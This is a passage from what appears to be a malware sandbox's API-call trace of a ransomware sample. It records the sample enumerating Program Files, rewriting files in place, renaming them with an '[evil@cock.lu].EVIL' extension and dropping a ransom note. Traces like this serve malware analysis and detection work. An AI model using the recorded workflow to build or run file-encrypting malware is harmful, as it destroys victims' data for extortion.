(_String1=".", _String2="Common Files") returned -1 [0080.157] wcscmp (_String1="..", _String2="Common Files") returned -1 [0080.157] wcslen (_String="C:\\\\Program Files\\Common Files") returned 0x1e [0080.157] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files" | out: _Destination="C:\\\\Program Files\\Common Files") returned 0x0 [0080.157] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\*") returned="C:\\\\Program Files\\Common Files\\*" [0080.157] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0080.157] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.157] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\.") returned 32 [0080.157] wcscmp (_String1=".", _String2=".") returned 0 [0080.157] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0080.157] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.157] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\..") returned 33 [0080.157] wcscmp (_String1=".", _String2="..") returned -1 [0080.157] wcscmp (_String1="..", _String2="..") returned 0 [0080.157] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0080.157] wcsstr (_Str="declaration.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.157] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\declaration.exe") returned 46 [0080.157] wcscmp (_String1="declaration.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.157] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="declaration.exe") returned 0x0 [0080.158] wcslen (_String="C:\\\\Program Files\\Common Files\\declaration.exe") returned 0x2e [0080.158] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\declaration.exe" (normalized: "c:\\program files\\common files\\declaration.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0080.158] GetLastError () returned 0x20 [0080.158] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0080.158] wcsstr (_Str="DESIGNER", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.158] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\DESIGNER") returned 39 [0080.158] wcscmp (_String1=".", _String2="DESIGNER") returned -1 [0080.158] wcscmp (_String1="..", _String2="DESIGNER") returned -1 [0080.158] wcslen (_String="C:\\\\Program Files\\Common Files\\DESIGNER") returned 0x27 [0080.158] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\DESIGNER" | out: _Destination="C:\\\\Program Files\\Common Files\\DESIGNER") returned 0x0 [0080.158] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\DESIGNER\\*") returned="C:\\\\Program Files\\Common Files\\DESIGNER\\*" [0080.158] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd3e0 [0080.175] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.175] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\DESIGNER\\.") returned 41 [0080.175] wcscmp (_String1=".", _String2=".") returned 0 [0080.175] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0080.175] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.176] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\DESIGNER\\..") returned 42 [0080.176] wcscmp (_String1=".", _String2="..") returned -1 [0080.176] wcscmp (_String1="..", _String2="..") returned 0 [0080.176] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0080.176] wcsstr (_Str="MSADDNDR.OLB", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.176] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0080.176] wcscmp (_String1="MSADDNDR.OLB", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.176] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="MSADDNDR.OLB") returned 0x0 [0080.176] wcslen (_String="C:\\\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 0x34 [0080.176] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0080.178] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2f040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x5ac0, lpOverlapped=0x0) returned 1 [0080.286] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.286] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.286] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.286] _errno () returned 0x84b1160840 [0080.286] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.286] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2f040*, nNumberOfBytesToWrite=0x5ae0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2f040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x5ae0, lpOverlapped=0x0) returned 1 [0080.286] CloseHandle (hObject=0x1a0) returned 1 [0080.287] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.287] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.287] __uncaught_exception () returned 0x84b1160800 [0080.287] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.288] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), lpNewFileName="C:\\\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.[evil@cock.lu].evil")) returned 1 [0080.289] ??_V@YAXPEAX@Z () returned 0x1 [0080.292] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", dwFileAttributes=0x0) returned 0 [0080.293] FindNextFileW (in: hFindFile=0x84b11dd3e0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0080.293] FindClose (in: hFindFile=0x84b11dd3e0 | out: hFindFile=0x84b11dd3e0) returned 1 [0080.293] wcslen (_String="C:\\\\Program Files\\Common Files\\DESIGNER") returned 0x27 [0080.293] strlen (_Str="${KEY}") returned 0x6 [0080.293] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0080.293] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0080.293] strlen (_Str="${CODE}") returned 0x7 [0080.293] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0080.293] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0080.293] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0080.293] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\DESIGNER\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.293] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0080.293] __uncaught_exception () returned 0x84b1160800 [0080.293] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.294] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0080.294] wcsstr (_Str="hour sponsored.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.294] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\hour sponsored.exe") returned 49 [0080.294] wcscmp (_String1="hour sponsored.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.294] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hour sponsored.exe") returned 0x0 [0080.294] wcslen (_String="C:\\\\Program Files\\Common Files\\hour sponsored.exe") returned 0x31 [0080.294] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\hour sponsored.exe" (normalized: "c:\\program files\\common files\\hour sponsored.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0080.294] GetLastError () returned 0x20 [0080.294] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0080.294] wcsstr (_Str="microsoft shared", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.294] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared") returned 47 [0080.294] wcscmp (_String1=".", _String2="microsoft shared") returned -1 [0080.295] wcscmp (_String1="..", _String2="microsoft shared") returned -1 [0080.295] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared") returned 0x2f [0080.295] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared") returned 0x0 [0080.295] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\*" [0080.295] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd2c0 [0080.295] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.295] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\.") returned 49 [0080.295] wcscmp (_String1=".", _String2=".") returned 0 [0080.295] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0080.295] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.295] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\..") returned 50 [0080.295] wcscmp (_String1=".", _String2="..") returned -1 [0080.295] wcscmp (_String1="..", _String2="..") returned 0 [0080.295] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0080.295] wcsstr (_Str="ClickToRun", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.295] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 58 [0080.295] wcscmp (_String1=".", _String2="ClickToRun") returned -1 [0080.295] wcscmp (_String1="..", _String2="ClickToRun") returned -1 [0080.295] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 0x3a [0080.295] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 0x0 [0080.295] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*" [0080.295] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd200 [0080.295] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.295] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\.") returned 60 [0080.295] wcscmp (_String1=".", _String2=".") returned 0 [0080.295] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.450] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.450] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\..") returned 61 [0080.450] wcscmp (_String1=".", _String2="..") returned -1 [0080.450] wcscmp (_String1="..", _String2="..") returned 0 [0080.450] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.450] wcsstr (_Str="api-ms-win-core-file-l1-2-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.451] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0080.451] wcscmp (_String1="api-ms-win-core-file-l1-2-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.451] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-file-l1-2-0.dll") returned 0x0 [0080.451] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 0x5a [0080.451] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.452] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x48c0, lpOverlapped=0x0) returned 1 [0080.488] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.488] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.488] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.488] _errno () returned 0x84b1160840 [0080.488] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.488] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x48e0, lpOverlapped=0x0) returned 1 [0080.488] CloseHandle (hObject=0x1a4) returned 1 [0080.489] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.489] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.489] __uncaught_exception () returned 0x84b1160800 [0080.489] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.490] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.[evil@cock.lu].evil")) returned 1 [0080.491] ??_V@YAXPEAX@Z () returned 0x1 [0080.494] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll", dwFileAttributes=0x0) returned 0 [0080.494] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.494] wcsstr (_Str="api-ms-win-core-file-l2-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.494] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0080.494] wcscmp (_String1="api-ms-win-core-file-l2-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.494] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-file-l2-1-0.dll") returned 0x0 [0080.494] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 0x5a [0080.494] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.496] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x48c0, lpOverlapped=0x0) returned 1 [0080.515] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.515] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.515] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.515] _errno () returned 0x84b1160840 [0080.515] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.516] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x48e0, lpOverlapped=0x0) returned 1 [0080.516] CloseHandle (hObject=0x1a4) returned 1 [0080.517] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.517] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.517] __uncaught_exception () returned 0x84b1160800 [0080.517] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.518] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll.[evil@cock.lu].evil")) returned 1 [0080.519] ??_V@YAXPEAX@Z () returned 0x1 [0080.522] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll", dwFileAttributes=0x0) returned 0 [0080.522] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.522] wcsstr (_Str="api-ms-win-core-localization-l1-2-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.522] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0080.522] wcscmp (_String1="api-ms-win-core-localization-l1-2-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.522] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-localization-l1-2-0.dll") returned 0x0 [0080.522] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 0x62 [0080.522] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.524] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x52c0, lpOverlapped=0x0) returned 1 [0080.576] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.576] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.576] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.576] _errno () returned 0x84b1160840 [0080.576] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.576] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x52e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x52e0, lpOverlapped=0x0) returned 1 [0080.576] CloseHandle (hObject=0x1a4) returned 1 [0080.577] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.577] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.577] __uncaught_exception () returned 0x84b1160800 [0080.577] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.578] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll.[evil@cock.lu].evil")) returned 1 [0080.578] ??_V@YAXPEAX@Z () returned 0x1 [0080.581] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll", dwFileAttributes=0x0) returned 0 [0080.581] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.581] wcsstr (_Str="api-ms-win-core-processthreads-l1-1-1.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.581] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0080.581] wcscmp (_String1="api-ms-win-core-processthreads-l1-1-1.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.581] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-processthreads-l1-1-1.dll") returned 0x0 [0080.581] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 0x64 [0080.582] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.583] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0080.622] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.622] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.622] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.622] _errno () returned 0x84b1160840 [0080.622] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.623] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: 